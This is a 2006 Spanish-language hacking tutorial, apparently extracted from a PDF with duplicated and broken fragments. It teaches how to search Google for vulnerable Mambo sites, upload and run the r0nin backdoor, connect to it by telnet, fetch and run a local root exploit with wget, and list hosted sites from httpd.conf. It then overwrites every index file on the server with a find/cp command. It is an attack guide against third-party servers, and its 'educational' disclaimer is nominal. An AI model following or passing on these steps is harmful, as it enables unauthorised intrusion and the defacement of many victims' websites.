Sie sind auf Seite 1von 4

Haciendo root y mass deface

Autor: 0o_zeus_o0

Buscando victimas:

Es muy fácil hoy en dia buscar victimas a explotar cualquier vulnerabilidad, tales como xss , html inyección , remote file inclusión, entre otros .

Como las buscamos? Pues sencillo simplemente vamos a nuestro buscador de preferencia , en mi caso google , buscaremos algo como mmm mambo J creo ese estaría bien .

Ia ke encontramos algunas paginas vulnerables chekamos kual de esos servers se

puede hacer root io tuve suerte y en la tercera búsqueda salio un servidor Linux redhat con un kernel 2.4.20-2.11 del 2003 como lo ven en la imagen

con un kernel 2.4.20-2.11 del 2003 como lo ven en la imagen Xplotando vulnerabilidad: Ya ke

Xplotando vulnerabilidad:

Ya ke encontramos nuestra victima nos disponemos a meter el backdoor , en mi

caso usare el r0nin , ke es muy famoso y lo pueden encontrar en cualkier parte

lo subimos a la pagina y nos disponemos a darles permisos 777 y ejecutarlo ,

como aremos eso? Simple solo vamos a poner en la caja de comandos

Chmod 777 r0nin; ./r0nin

Y nos saldra algo como esto

PsychoPhobia Backdoor is starting

Conectando y haciendo root:

OK, pid = 26528

Bien tenemos nuestro backdoor listo para usar, ahora usaremos la siguiente herramienta “putty” este es un cliente muy bueno para telnet y ssh , lo abrimos y en el campo de host pondremos la dirección ke atakaremos y seleccionamos la opción telnet en el puerto 1666 ke es el puerto ke usa nuestro backdoor como lo ven en la siguiente imagen.

Created with novaPDF Printer (www.novaPDF.com)

Después de esto nos saldrá una pantalla negra, lo cual significa ke nuestro backdoor hizo

Después de esto nos saldrá una pantalla negra, lo cual significa ke nuestro backdoor hizo conexión, ahora nos disponemos a ejecutar comandos, en este caso no usare muchos, para empezar usare id, esto es para ver los permisos ke tenemos , como podemos ver en la imagen tenemos permisos

uid=48(apache) gid=48(apache) groups=48(apache)

permisos uid=48(apache) gid=48(apache) groups=48(apache) los cuales cambiaremos por permisos de root , después de

los cuales cambiaremos por permisos de root , después de que nos conecto a telnet , subiremos nuestro xploit con el cual rotearemos el servidor , en mi caso usare el w00t , lo subiremos a el servidor usando wget y le daremos permisos 777 y lo ejecutaremos como lo vemos en las siguientes imágenes

Created with novaPDF Printer (www.novaPDF.com)

Listo tenemos root , el siguiente paso sera buscar el archivo httpd.conf , por lo

Listo tenemos root , el siguiente paso sera buscar el archivo httpd.conf , por lo regular se encuentra en las carpetas

/etc/httpd/conf/httpd.conf

Pero si no es asi usaremos

find / -name httpd.conf

ia ke lo encontramos guardaremos su contenido en un .txt con el siguiente comando

cat /etc/httpd/conf/httpd.conf | grep ServerName >/home/shito-ryu/public_html/webs.txt

(se preguntaran para que hacemos eso , es para saber la configuración del servidor y los sitios ke tiene)

saber la configuración del servidor y los sitios ke tiene) Sobre escribiendo index: Después de haber

Sobre escribiendo index:

Después de haber sakado el httpd.conf y haber enlistado las webs vamos a sobre escribir todos los index de el servidor , primero tenemos ke subir un mirror el cual sobre escribirá los demás index , el mio en este casi se llama lol.html , lo pondré en la carpeta principal , después de eso pongo

find / -name "index.*" -exec cp /home/shito-ryu/public_html/lol.html {} \;

eso es en mi caso ia ke la carpeta public_html tenia permisos

pero puede ser también de estar forma

Created with novaPDF Printer (www.novaPDF.com)

find / -name "index.*" -exec cp /tmp/ lol.html {} \;

o de donde se encuentre su mirror

cp /tmp/ lol.html {} \; o de donde se encuentre su mirror Esto llevara algunos minutos

Esto llevara algunos minutos si es ke son varios sitios , sabremos ke ha terminado ia ke nos enviara de nuevo

Sh-2.05b# para ejecutar un comando

El final si revisamos los sitios aparecera su mirror en el index

Despedida :

Espero ke les sirva de algo este manual para las personas ke inician en este medio, el contenido es educativo, si el uso mal apropiado de este manual se llega a dar es responsabilidad de el lector no de el autor , si tienes algun comentario envia un correo a zeus@diosdelared.com

Agradecimientos:

A mi chikita Lady Fire, mi beba , a fraude , x0x0 ,Pandora, eL_mEsIAs y a todos

akellos aquellos ke han estado a mi lado todo este tiempo

No modificar este tutorial. Mexico 24 de enero de 2006

Created with novaPDF Printer (www.novaPDF.com)